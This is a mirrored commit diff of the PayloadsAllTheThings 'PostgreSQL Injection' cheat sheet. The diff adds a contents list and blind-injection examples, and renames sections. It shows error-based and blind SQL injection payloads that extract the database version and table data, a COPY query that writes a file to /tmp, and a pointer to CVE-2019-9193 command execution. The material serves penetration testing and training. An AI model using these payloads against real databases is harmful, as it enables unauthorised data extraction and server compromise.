gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-01-03 00:09:46 -08:00
Code Issues Packages Projects Releases Wiki Activity

PostgreSQL rewrite + LFI SSH

Browse Source
This commit is contained in:
Swissky
2019-06-29 19:23:34 +02:00
parent 144b3827ab
commit 46780de750
6 changed files with 91 additions and 11 deletions
Download Patch File Download Diff File Expand all files Collapse all files

27
SQL Injection/PostgreSQL Injection.md
View File

@@ -1,4 +1,15 @@
# POSTGRESQL
# PostgreSQL injection
## Summary
* [PostgreSQL Comments](#postgresql-comments)
* [PostgreSQL Error Based](#postgresql-error-based)
* [PostgreSQL Blind](#postgresql-blind)
* [PostgreSQL Time Based](#postgresql-time-based)
* [PostgreSQL File Read](#postgresql-file-read)
* [PostgreSQL File Write](#postgresql-file-write)
* [PostgreSQL Command execution](#postgresql-command-execution)
* [References](#references)
## PostgreSQL Comments
@@ -7,7 +18,7 @@
/**/
```
## PostgreSQL Error Based - Basic
## PostgreSQL Error Based
```sql
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
@@ -16,6 +27,13 @@
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
```
## PostgreSQL Blind
```sql
' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK
' and substr(version(),1,10) = 'PostgreXXX' and '1 -> KO
```
## PostgreSQL Time Based
```sql
@@ -47,7 +65,7 @@ SELECT * FROM pentestlab;
COPY pentestlab(t) TO '/tmp/pentestlab';
```
## PostgreSQL - Command execution
## PostgreSQL Command execution
CVE-20199193, can be used from [Metasploit](https://github.com/rapid7/metasploit-framework/pull/11598) if you have a direct access to the database, otherwise you need to execute manually the following SQL queries.
@@ -64,4 +82,5 @@ DROP TABLE IF EXISTS cmd_exec; -- [Optional] Remove the table
## References
* [A Penetration Testers Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
* [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803)